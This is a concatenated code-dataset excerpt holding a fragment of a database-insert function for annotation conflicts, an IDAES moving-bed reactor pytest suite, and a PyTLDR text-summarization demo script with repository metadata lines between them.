    if resolving_username is None:
        if g.user is not None:
            resolving_username = g.user['username']
        else:
            raise ValueError(f"No active user while trying to set journal annotation conflict resolution '{annotation_type}'.")
    resolution_type = 'username'
    db = get_db()
    db.execute(
        """INSERT INTO journalAnnotationConflictResolution
           (site_id, journal_oid, resolving_username, annotation_type, resolution_type, correct_username)
           VALUES (?, ?, ?, ?, ?, ?)""",
        (site_id, journal_oid, resolving_username, annotation_type, resolution_type, correct_username)
    )
    if commit:
        db.commit()
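The core of the conflict check above (split the annotation on `"|"`, drop the `"unknown"` label, compare the two sets) can be isolated as a small pure function. A minimal sketch of that logic — the helper name and signature are illustrative, not part of this module:

```python
def detect_phase_conflict(data1, data2, ignore=frozenset({"unknown"})):
    """Return (in_common, only1, only2) if the two '|'-delimited
    annotation strings disagree after dropping ignored labels,
    else None (no conflict)."""
    p1 = set(data1.split("|")) - ignore
    p2 = set(data2.split("|")) - ignore
    if p1 == p2:
        return None
    return (sorted(p1 & p2), sorted(p1 - p2), sorted(p2 - p1))

# Two annotators agree on 'treatment' but disagree on the rest;
# 'unknown' is ignored on both sides.
result = detect_phase_conflict("pretreatment|treatment|unknown",
                               "treatment|end_of_life")
```

Ignoring `"unknown"` before comparing means one annotator marking a phase as unknown never produces a spurious conflict by itself.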
6985712bc278c6566f47ffd128e9c956eee0ff4e | 22,855 | py | Python | idaes/gas_solid_contactors/unit_models/tests/test_MB.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 1 | 2019-02-21T22:03:48.000Z | 2019-02-21T22:03:48.000Z | idaes/gas_solid_contactors/unit_models/tests/test_MB.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 1 | 2021-03-01T22:05:06.000Z | 2021-03-01T22:05:06.000Z | idaes/gas_solid_contactors/unit_models/tests/test_MB.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 1 | 2021-11-04T14:57:20.000Z | 2021-11-04T14:57:20.000Z |
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for ControlVolumeBlockData, and for initializing the moving bed module
Author: Chinedu Okoli
"""
import pytest
from pyomo.environ import (ConcreteModel,
                           TerminationCondition,
                           SolverStatus,
                           value,
                           Var,
                           Constraint)
from pyomo.common.config import ConfigBlock
from pyomo.util.calc_var_value import calculate_variable_from_constraint

from idaes.core import (FlowsheetBlock,
                        MaterialBalanceType,
                        EnergyBalanceType,
                        MomentumBalanceType)
from idaes.core.util.model_statistics import (degrees_of_freedom,
                                              number_variables,
                                              number_total_constraints,
                                              number_unused_variables,
                                              unused_variables_set)
from idaes.core.util.testing import initialization_tester
from idaes.core.util import get_solver

# Import MBR unit model
from idaes.gas_solid_contactors.unit_models.moving_bed import MBR

# Import property packages
from idaes.gas_solid_contactors.properties.methane_iron_OC_reduction. \
    gas_phase_thermo import GasPhaseParameterBlock
from idaes.gas_solid_contactors.properties.methane_iron_OC_reduction. \
    solid_phase_thermo import SolidPhaseParameterBlock
from idaes.gas_solid_contactors.properties.methane_iron_OC_reduction. \
    hetero_reactions import HeteroReactionParameterBlock
# -----------------------------------------------------------------------------
# Get default solver for testing
solver = get_solver()
# -----------------------------------------------------------------------------
@pytest.mark.unit
def test_config():
    m = ConcreteModel()
    m.fs = FlowsheetBlock(default={"dynamic": False})

    # Set up thermo props and reaction props
    m.fs.gas_properties = GasPhaseParameterBlock()
    m.fs.solid_properties = SolidPhaseParameterBlock()
    m.fs.hetero_reactions = HeteroReactionParameterBlock(
        default={"solid_property_package": m.fs.solid_properties,
                 "gas_property_package": m.fs.gas_properties})

    m.fs.unit = MBR(
        default={
            "gas_phase_config":
                {"property_package": m.fs.gas_properties},
            "solid_phase_config":
                {"property_package": m.fs.solid_properties,
                 "reaction_package": m.fs.hetero_reactions}})

    # Check unit config arguments
    assert len(m.fs.unit.config) == 15
    assert isinstance(m.fs.unit.config.gas_phase_config, ConfigBlock)
    assert isinstance(m.fs.unit.config.solid_phase_config, ConfigBlock)

    assert m.fs.unit.config.finite_elements == 10
    assert m.fs.unit.config.length_domain_set == [0.0, 1.0]
    assert m.fs.unit.config.transformation_method == "dae.finite_difference"
    assert m.fs.unit.config.transformation_scheme == 'BACKWARD'
    assert m.fs.unit.config.collocation_points == 3
    assert m.fs.unit.config.flow_type == "counter_current"
    assert m.fs.unit.config.material_balance_type == \
        MaterialBalanceType.componentTotal
    assert m.fs.unit.config.energy_balance_type == \
        EnergyBalanceType.enthalpyTotal
    assert m.fs.unit.config.momentum_balance_type == \
        MomentumBalanceType.pressureTotal
    assert m.fs.unit.config.has_pressure_change is True

    # Check gas phase config arguments
    assert len(m.fs.unit.config.gas_phase_config) == 7
    assert m.fs.unit.config.gas_phase_config.has_equilibrium_reactions is False
    assert m.fs.unit.config.gas_phase_config.property_package is \
        m.fs.gas_properties
    assert m.fs.unit.config.gas_phase_config.reaction_package is None

    # Check solid phase config arguments
    assert len(m.fs.unit.config.solid_phase_config) == 7
    assert m.fs.unit.config.solid_phase_config.has_equilibrium_reactions is \
        False
    assert m.fs.unit.config.solid_phase_config.property_package is \
        m.fs.solid_properties
    assert m.fs.unit.config.solid_phase_config.reaction_package is \
        m.fs.hetero_reactions
# -----------------------------------------------------------------------------
class TestIronOC(object):
    @pytest.fixture(scope="class")
    def iron_oc(self):
        m = ConcreteModel()
        m.fs = FlowsheetBlock(default={"dynamic": False})

        # Set up thermo props and reaction props
        m.fs.gas_properties = GasPhaseParameterBlock()
        m.fs.solid_properties = SolidPhaseParameterBlock()
        m.fs.hetero_reactions = HeteroReactionParameterBlock(
            default={"solid_property_package": m.fs.solid_properties,
                     "gas_property_package": m.fs.gas_properties})

        m.fs.unit = MBR(
            default={
                "gas_phase_config":
                    {"property_package": m.fs.gas_properties},
                "solid_phase_config":
                    {"property_package": m.fs.solid_properties,
                     "reaction_package": m.fs.hetero_reactions}})

        # Fix geometry variables
        m.fs.unit.bed_diameter.fix(6.5)  # m
        m.fs.unit.bed_height.fix(5)  # m

        # Fix inlet port variables for gas and solid
        m.fs.unit.gas_inlet.flow_mol[0].fix(128.20513)  # mol/s
        m.fs.unit.gas_inlet.temperature[0].fix(298.15)  # K
        m.fs.unit.gas_inlet.pressure[0].fix(2.00)  # bar
        m.fs.unit.gas_inlet.mole_frac_comp[0, "CO2"].fix(0.02499)
        m.fs.unit.gas_inlet.mole_frac_comp[0, "H2O"].fix(0.00001)
        m.fs.unit.gas_inlet.mole_frac_comp[0, "CH4"].fix(0.975)

        m.fs.unit.solid_inlet.flow_mass[0].fix(591.4)  # kg/s
        m.fs.unit.solid_inlet.particle_porosity[0].fix(0.27)  # (-)
        m.fs.unit.solid_inlet.temperature[0].fix(1183.15)  # K
        m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe2O3"].fix(0.45)
        m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe3O4"].fix(1e-9)
        m.fs.unit.solid_inlet.mass_frac_comp[0, "Al2O3"].fix(0.55)

        return m

    @pytest.mark.build
    @pytest.mark.unit
    def test_build(self, iron_oc):
        assert hasattr(iron_oc.fs.unit, "gas_inlet")
        assert len(iron_oc.fs.unit.gas_inlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.gas_inlet.flow_mol, Var)
        assert isinstance(iron_oc.fs.unit.gas_inlet.mole_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.gas_inlet.temperature, Var)
        assert isinstance(iron_oc.fs.unit.gas_inlet.pressure, Var)

        assert hasattr(iron_oc.fs.unit, "solid_inlet")
        assert len(iron_oc.fs.unit.solid_inlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.solid_inlet.flow_mass, Var)
        assert isinstance(iron_oc.fs.unit.solid_inlet.particle_porosity, Var)
        assert isinstance(iron_oc.fs.unit.solid_inlet.mass_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.solid_inlet.temperature, Var)

        assert hasattr(iron_oc.fs.unit, "gas_outlet")
        assert len(iron_oc.fs.unit.gas_outlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.gas_outlet.flow_mol, Var)
        assert isinstance(iron_oc.fs.unit.gas_outlet.mole_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.gas_outlet.temperature, Var)
        assert isinstance(iron_oc.fs.unit.gas_outlet.pressure, Var)

        assert hasattr(iron_oc.fs.unit, "solid_outlet")
        assert len(iron_oc.fs.unit.solid_outlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.solid_outlet.flow_mass, Var)
        assert isinstance(iron_oc.fs.unit.solid_outlet.particle_porosity, Var)
        assert isinstance(iron_oc.fs.unit.solid_outlet.mass_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.solid_outlet.temperature, Var)

        assert isinstance(iron_oc.fs.unit.bed_area_eqn, Constraint)
        assert isinstance(iron_oc.fs.unit.gas_phase_area, Constraint)
        assert isinstance(iron_oc.fs.unit.solid_phase_area, Constraint)
        assert isinstance(iron_oc.fs.unit.gas_super_vel, Constraint)
        assert isinstance(iron_oc.fs.unit.solid_super_vel, Constraint)
        assert isinstance(iron_oc.fs.unit.gas_phase_config_pressure_drop,
                          Constraint)
        assert isinstance(iron_oc.fs.unit.gas_solid_htc_eqn, Constraint)
        assert isinstance(iron_oc.fs.unit.gas_phase_heat_transfer,
                          Constraint)
        assert isinstance(iron_oc.fs.unit.solid_phase_config_rxn_ext,
                          Constraint)
        assert isinstance(iron_oc.fs.unit.gas_comp_hetero_rxn, Constraint)

        assert number_variables(iron_oc) == 819
        assert number_total_constraints(iron_oc) == 781
        assert number_unused_variables(iron_oc) == 16
    @pytest.mark.unit
    def test_dof(self, iron_oc):
        assert degrees_of_freedom(iron_oc) == 0

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_initialize(self, iron_oc):
        initialization_tester(
            iron_oc,
            optarg={'tol': 1e-6},
            gas_phase_state_args={"flow_mol": 128.20513,
                                  "temperature": 1183.15,
                                  "pressure": 2.00},
            solid_phase_state_args={"flow_mass": 591.4,
                                    "temperature": 1183.15})

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_solve(self, iron_oc):
        results = solver.solve(iron_oc)

        # Check for optimal solution
        assert results.solver.termination_condition == \
            TerminationCondition.optimal
        assert results.solver.status == SolverStatus.ok

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_solution(self, iron_oc):
        assert (pytest.approx(0.0479, abs=1e-2) ==
                iron_oc.fs.unit.velocity_superficial_gas[0, 0].value)
        assert (pytest.approx(0.5675, abs=1e-2) ==
                iron_oc.fs.unit.velocity_superficial_gas[0, 1].value)
        assert (pytest.approx(0.0039, abs=1e-2) ==
                iron_oc.fs.unit.velocity_superficial_solid[0].value)
        assert (pytest.approx(1.975, abs=1e-2) ==
                iron_oc.fs.unit.gas_outlet.pressure[0].value)

        # Check that pressure drop occurs across the bed
        assert value(
            iron_oc.fs.unit.gas_inlet.pressure[0] -
            iron_oc.fs.unit.gas_outlet.pressure[0]) >= 0

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_conservation(self, iron_oc):
        # Conservation of material check
        calculate_variable_from_constraint(
            iron_oc.fs.unit.gas_phase.properties[0, 0].mw,
            iron_oc.fs.unit.gas_phase.properties[0, 0].mw_eqn)
        calculate_variable_from_constraint(
            iron_oc.fs.unit.gas_phase.properties[0, 1].mw,
            iron_oc.fs.unit.gas_phase.properties[0, 1].mw_eqn)

        mbal_gas = value(
            (iron_oc.fs.unit.gas_inlet.flow_mol[0] *
             iron_oc.fs.unit.gas_phase.properties[0, 0].mw) -
            (iron_oc.fs.unit.gas_outlet.flow_mol[0] *
             iron_oc.fs.unit.gas_phase.properties[0, 1].mw))
        mbal_solid = value(
            iron_oc.fs.unit.solid_inlet.flow_mass[0] -
            iron_oc.fs.unit.solid_outlet.flow_mass[0])
        mbal_tol = mbal_gas + mbal_solid
        assert abs(mbal_tol) <= 1e-2

        # Reaction stoichiometric ratio check
        # Overall reducer reactions for methane combustion:
        # CH4 + 12Fe2O3 => 8Fe3O4 + CO2 + 2H2O
        mole_gas_reacted = value(
            iron_oc.fs.unit.gas_inlet.flow_mol[0] *
            iron_oc.fs.unit.gas_inlet.mole_frac_comp[0, 'CH4'] -
            iron_oc.fs.unit.gas_outlet.flow_mol[0] *
            iron_oc.fs.unit.gas_outlet.mole_frac_comp[0, 'CH4'])
        mole_solid_reacted = value(
            (iron_oc.fs.unit.solid_inlet.flow_mass[0] *
             iron_oc.fs.unit.solid_inlet.mass_frac_comp[0, 'Fe2O3'] /
             iron_oc.fs.unit.solid_phase.properties[0, 1].
             _params.mw_comp['Fe2O3']) -
            (iron_oc.fs.unit.solid_outlet.flow_mass[0] *
             iron_oc.fs.unit.solid_outlet.mass_frac_comp[0, 'Fe2O3'] /
             iron_oc.fs.unit.solid_phase.properties[0, 0].
             _params.mw_comp['Fe2O3']))
        stoichiometric_ratio = mole_solid_reacted / mole_gas_reacted
        assert (pytest.approx(12, abs=1e-6) == stoichiometric_ratio)

        # Conservation of energy check
        ebal_gas = value(
            (iron_oc.fs.unit.gas_inlet.flow_mol[0] *
             iron_oc.fs.unit.gas_phase.properties[0, 0].enth_mol) -
            (iron_oc.fs.unit.gas_outlet.flow_mol[0] *
             iron_oc.fs.unit.gas_phase.properties[0, 1].enth_mol))
        ebal_solid = value(
            (iron_oc.fs.unit.solid_inlet.flow_mass[0] *
             iron_oc.fs.unit.solid_phase.properties[0, 1].enth_mass) -
            (iron_oc.fs.unit.solid_outlet.flow_mass[0] *
             iron_oc.fs.unit.solid_phase.properties[0, 0].enth_mass))
        e_reaction = value(
            mole_gas_reacted *
            iron_oc.fs.unit.solid_phase.reactions[0, 1].
            _params.dh_rxn["R1"])
        ebal_tol = ebal_gas + ebal_solid - e_reaction
        assert abs(ebal_tol) <= 1e-2

    @pytest.mark.ui
    @pytest.mark.unit
    def test_report(self, iron_oc):
        iron_oc.fs.unit.report()
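The 12:1 solid-to-gas ratio asserted in `test_conservation` follows directly from the reducer stoichiometry CH4 + 12 Fe2O3 => 8 Fe3O4 + CO2 + 2 H2O. A quick element-balance check of that equation (for illustration only, independent of the IDAES model):

```python
# Atom counts on each side of CH4 + 12 Fe2O3 -> 8 Fe3O4 + CO2 + 2 H2O
lhs = {"C": 1, "H": 4, "Fe": 12 * 2, "O": 12 * 3}
rhs = {"C": 1, "H": 2 * 2, "Fe": 8 * 3, "O": 8 * 4 + 2 + 2 * 1}

# The equation is balanced, so 12 mol Fe2O3 are consumed per mol CH4,
# which is exactly the stoichiometric_ratio the test checks.
balanced = (lhs == rhs)
```
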
# -----------------------------------------------------------------------------
class TestIronOC_EnergyBalanceType(object):
    @pytest.fixture(scope="class")
    def iron_oc(self):
        m = ConcreteModel()
        m.fs = FlowsheetBlock(default={"dynamic": False})

        # Set up thermo props and reaction props
        m.fs.gas_properties = GasPhaseParameterBlock()
        m.fs.solid_properties = SolidPhaseParameterBlock()
        m.fs.hetero_reactions = HeteroReactionParameterBlock(
            default={"solid_property_package": m.fs.solid_properties,
                     "gas_property_package": m.fs.gas_properties})

        m.fs.unit = MBR(
            default={
                "energy_balance_type": EnergyBalanceType.none,
                "gas_phase_config":
                    {"property_package": m.fs.gas_properties},
                "solid_phase_config":
                    {"property_package": m.fs.solid_properties,
                     "reaction_package": m.fs.hetero_reactions}})

        # Fix geometry variables
        m.fs.unit.bed_diameter.fix(6.5)  # m
        m.fs.unit.bed_height.fix(5)  # m

        # Fix inlet port variables for gas and solid
        m.fs.unit.gas_inlet.flow_mol[0].fix(128.20513)  # mol/s
        m.fs.unit.gas_inlet.temperature[0].fix(1183.15)  # K
        m.fs.unit.gas_inlet.pressure[0].fix(2.00)  # bar
        m.fs.unit.gas_inlet.mole_frac_comp[0, "CO2"].fix(0.02499)
        m.fs.unit.gas_inlet.mole_frac_comp[0, "H2O"].fix(0.00001)
        m.fs.unit.gas_inlet.mole_frac_comp[0, "CH4"].fix(0.975)

        m.fs.unit.solid_inlet.flow_mass[0].fix(591.4)  # kg/s
        m.fs.unit.solid_inlet.temperature[0].fix(1183.15)  # K
        m.fs.unit.solid_inlet.particle_porosity[0].fix(0.27)  # (-)
        m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe2O3"].fix(0.45)
        m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe3O4"].fix(1e-9)
        m.fs.unit.solid_inlet.mass_frac_comp[0, "Al2O3"].fix(0.55)

        return m

    @pytest.mark.build
    @pytest.mark.unit
    def test_build(self, iron_oc):
        assert hasattr(iron_oc.fs.unit, "gas_inlet")
        assert len(iron_oc.fs.unit.gas_inlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.gas_inlet.flow_mol, Var)
        assert isinstance(iron_oc.fs.unit.gas_inlet.mole_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.gas_inlet.temperature, Var)
        assert isinstance(iron_oc.fs.unit.gas_inlet.pressure, Var)

        assert hasattr(iron_oc.fs.unit, "solid_inlet")
        assert len(iron_oc.fs.unit.solid_inlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.solid_inlet.flow_mass, Var)
        assert isinstance(iron_oc.fs.unit.solid_inlet.particle_porosity, Var)
        assert isinstance(iron_oc.fs.unit.solid_inlet.mass_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.solid_inlet.temperature, Var)

        assert hasattr(iron_oc.fs.unit, "gas_outlet")
        assert len(iron_oc.fs.unit.gas_outlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.gas_outlet.flow_mol, Var)
        assert isinstance(iron_oc.fs.unit.gas_outlet.mole_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.gas_outlet.temperature, Var)
        assert isinstance(iron_oc.fs.unit.gas_outlet.pressure, Var)

        assert hasattr(iron_oc.fs.unit, "solid_outlet")
        assert len(iron_oc.fs.unit.solid_outlet.vars) == 4
        assert isinstance(iron_oc.fs.unit.solid_outlet.flow_mass, Var)
        assert isinstance(iron_oc.fs.unit.solid_outlet.particle_porosity, Var)
        assert isinstance(iron_oc.fs.unit.solid_outlet.mass_frac_comp, Var)
        assert isinstance(iron_oc.fs.unit.solid_outlet.temperature, Var)

        assert isinstance(iron_oc.fs.unit.isothermal_gas_phase, Constraint)
        assert isinstance(iron_oc.fs.unit.isothermal_solid_phase, Constraint)

        assert number_variables(iron_oc) == 588
        assert number_total_constraints(iron_oc) == 508
        assert number_unused_variables(iron_oc) == 59
        print(unused_variables_set(iron_oc))
    @pytest.mark.unit
    def test_dof(self, iron_oc):
        assert degrees_of_freedom(iron_oc) == 0

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_initialize(self, iron_oc):
        initialization_tester(
            iron_oc,
            optarg={'tol': 1e-6},
            gas_phase_state_args={"flow_mol": 128.20513,
                                  "temperature": 1183.15,
                                  "pressure": 2.00},
            solid_phase_state_args={"flow_mass": 591.4,
                                    "temperature": 1183.15})

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_solve(self, iron_oc):
        results = solver.solve(iron_oc)

        # Check for optimal solution
        assert results.solver.termination_condition == \
            TerminationCondition.optimal
        assert results.solver.status == SolverStatus.ok

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_solution(self, iron_oc):
        assert (pytest.approx(0.1900, abs=1e-2) ==
                iron_oc.fs.unit.velocity_superficial_gas[0, 0].value)
        assert (pytest.approx(0.5675, abs=1e-2) ==
                iron_oc.fs.unit.velocity_superficial_gas[0, 1].value)
        assert (pytest.approx(0.0039, abs=1e-2) ==
                iron_oc.fs.unit.velocity_superficial_solid[0].value)
        assert (pytest.approx(1.975, abs=1e-2) ==
                iron_oc.fs.unit.gas_outlet.pressure[0].value)

        # Check that pressure drop occurs across the bed
        assert value(
            iron_oc.fs.unit.gas_inlet.pressure[0] -
            iron_oc.fs.unit.gas_outlet.pressure[0]) >= 0

    @pytest.mark.solver
    @pytest.mark.skipif(solver is None, reason="Solver not available")
    @pytest.mark.component
    def test_conservation(self, iron_oc):
        # Conservation of material check
        calculate_variable_from_constraint(
            iron_oc.fs.unit.gas_phase.properties[0, 0].mw,
            iron_oc.fs.unit.gas_phase.properties[0, 0].mw_eqn)
        calculate_variable_from_constraint(
            iron_oc.fs.unit.gas_phase.properties[0, 1].mw,
            iron_oc.fs.unit.gas_phase.properties[0, 1].mw_eqn)

        mbal_gas = value(
            (iron_oc.fs.unit.gas_inlet.flow_mol[0] *
             iron_oc.fs.unit.gas_phase.properties[0, 0].mw) -
            (iron_oc.fs.unit.gas_outlet.flow_mol[0] *
             iron_oc.fs.unit.gas_phase.properties[0, 1].mw))
        mbal_solid = value(
            iron_oc.fs.unit.solid_inlet.flow_mass[0] -
            iron_oc.fs.unit.solid_outlet.flow_mass[0])
        mbal_tol = mbal_gas + mbal_solid
        assert abs(mbal_tol) <= 1e-2

        # Reaction stoichiometric ratio check
        # Overall reducer reactions for methane combustion:
        # CH4 + 12Fe2O3 => 8Fe3O4 + CO2 + 2H2O
        mole_gas_reacted = value(
            iron_oc.fs.unit.gas_inlet.flow_mol[0] *
            iron_oc.fs.unit.gas_inlet.mole_frac_comp[0, 'CH4'] -
            iron_oc.fs.unit.gas_outlet.flow_mol[0] *
            iron_oc.fs.unit.gas_outlet.mole_frac_comp[0, 'CH4'])
        mole_solid_reacted = value(
            (iron_oc.fs.unit.solid_inlet.flow_mass[0] *
             iron_oc.fs.unit.solid_inlet.mass_frac_comp[0, 'Fe2O3'] /
             iron_oc.fs.unit.solid_phase.properties[0, 1].
             _params.mw_comp['Fe2O3']) -
            (iron_oc.fs.unit.solid_outlet.flow_mass[0] *
             iron_oc.fs.unit.solid_outlet.mass_frac_comp[0, 'Fe2O3'] /
             iron_oc.fs.unit.solid_phase.properties[0, 0].
             _params.mw_comp['Fe2O3']))
        stoichiometric_ratio = mole_solid_reacted / mole_gas_reacted
        assert (pytest.approx(12, abs=1e-6) == stoichiometric_ratio)

    @pytest.mark.ui
    @pytest.mark.unit
    def test_report(self, iron_oc):
        iron_oc.fs.unit.report()
69aeb8ee2e3bc3d416bf037b60ffb5a4bc35d3e8 | 15,539 | py | Python | demo/examples/sum.pytldr/other_examples.py | YourNorth/rezak-summarizator | 3ab2f4bf1044ea9654b4084a39030987e4b8bfe8 | [
"MIT"
] | 3 | 2020-03-28T16:48:10.000Z | 2020-12-01T17:18:55.000Z | demo/examples/sum.pytldr/other_examples.py | YourNorth/rezak-summarizator | 3ab2f4bf1044ea9654b4084a39030987e4b8bfe8 | [
"MIT"
] | 31 | 2020-03-20T17:53:08.000Z | 2021-03-10T11:48:11.000Z | demo/examples/sum.pytldr/other_examples.py | YourNorth/rezak-summarizator | 3ab2f4bf1044ea9654b4084a39030987e4b8bfe8 | [
"MIT"
] | 1 | 2020-03-20T05:01:16.000Z | 2020-03-20T05:01:16.000Z |
# More details: https://pypi.org/project/PyTLDR/
def example_1():
    """
    1. The module ships several summarizer implementations.
    All of them are extractive:
        - the TextRank algorithm (based on PageRank)
        - Latent Semantic Analysis
        - a sentence relevance score
    """
    from pytldr.summarize.lsa import LsaOzsoy, LsaSteinberger
    from pytldr.summarize.relevance import RelevanceSummarizer
    from pytldr.summarize.textrank import TextRankSummarizer

    txt = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? 
From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
    """

    GREEN = '\033[100m'
    END = '\033[0m'

    impls = {
        'LSA Ozsoy': LsaOzsoy(),
        'LSA Steinberger': LsaSteinberger(),
        'Relevance': RelevanceSummarizer(),
        'TextRank': TextRankSummarizer()
    }

    for label, impl in impls.items():
        print(f'\n\n{GREEN}{label}:{" " * 128}{END}\n')
        summary = impl.summarize(txt, length=5)
        for sentence in summary:
            print(sentence)
def example_2():
    """
    The module bundles its own sentence tokenizer.
    The tokenizer performs stemming in several languages, as well as
    stop-word removal, and you can supply your own stop-word list.
    The tokenizer is specified once, when the summarizer is created:
    >> LsaSummarizer(tokenizer) and likewise for the others

    Note: since the algorithms are extractive, the tokenizer does not
    remove words from the output sentences themselves (as tested), but
    the stop-word list definitely affects how sentence importance is ranked.
    """
    from pytldr.nlp.tokenizer import Tokenizer
    from pytldr.summarize.lsa import LsaSummarizer

    stopwords = ["the", "a", "but", "she", "said"]
    tokenizer = Tokenizer(language='english', stopwords=stopwords, stemming=True)

    # Note that if stopwords=None then the tokenizer loads stopwords from a bundled data-set
    # You can alternatively specify a text file or provide a list of words

    txt = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? 
From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
    """

    [print(s) for s in LsaSummarizer(tokenizer).summarize(txt)]
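The note in `example_2` — stop-words change how sentences are *ranked*, not the sentence text that comes out — can be illustrated with a toy frequency-based scorer. This is independent of PyTLDR; the function name and scoring scheme are illustrative only:

```python
import re

def score_sentences(sentences, stopwords=frozenset()):
    """Score each sentence by summed corpus word frequency,
    ignoring stop-words; the sentence text itself is untouched."""
    words = [w for s in sentences for w in re.findall(r"[a-z]+", s.lower())
             if w not in stopwords]
    freq = {w: words.count(w) for w in set(words)}
    return [sum(freq.get(w, 0) for w in re.findall(r"[a-z]+", s.lower())
                if w not in stopwords)
            for s in sentences]

sents = ["the cat sat", "a dog barked", "the the the"]
plain = score_sentences(sents)                            # 'the' dominates
filtered = score_sentences(sents, stopwords={"the", "a"})  # content words only
```

Without filtering, the sentence "the the the" wins on raw frequency; with stop-words removed it scores zero, while the actual sentence strings are never modified.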
def example_3():
    """
    TextRank summarization.
    Ranks sentences with the PageRank algorithm, where the "votes" or
    "in-links" are represented by the words shared between sentences.
    """
    from pytldr.summarize.textrank import TextRankSummarizer
    from pytldr.nlp.tokenizer import Tokenizer
    tokenizer = Tokenizer('english')
    summarizer = TextRankSummarizer(tokenizer)
    # If you don't specify a tokenizer when initializing a summarizer, the
    # English tokenizer is used by default:
    summarizer = TextRankSummarizer()  # English tokenizer used
    # This object creates a summary via the summarize method, e.g.
    # summarizer.summarize(text, length=5, weighting='frequency', norm=None)
    # The length parameter specifies the length of the summary, either as a
    # number of sentences or as a percentage of the original text.
